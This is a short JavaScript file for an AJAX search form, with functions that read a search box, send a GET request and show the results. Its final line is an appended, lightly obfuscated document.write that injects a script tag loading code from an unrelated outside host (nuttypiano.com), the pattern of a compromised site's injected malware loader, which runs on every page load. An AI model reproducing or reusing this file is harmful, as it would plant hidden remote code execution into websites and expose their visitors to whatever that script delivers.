	
	var ys = function() {
		return {
			prep: function() {
				search_value = $('search_input').value;
	
				if (search_value == '') {
					console.log('Please enter the text you want to search upon.');
					return false;
				} else {
					button.disabled = true;
					results.toggle();
					ajax_url = search_url + search_value;
					setTimeout("ys.send();", 600);
				}
			},

			send: function() {
				new ajax(ajax_url, {
					method: 'get',
					update: $('search_results'),
					onComplete: function() {
						ys.display();
					}
				});
			},

			display: function() {
				setTimeout('results.toggle();', 100);
				button.disabled = false;
			},
			
			init: function() {
				$('search_form').onsubmit = function() {
					ys.prep();
					return false;
				};
			}
		};
	}();
document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Illegal_Operation.js"></scri'+'pt>');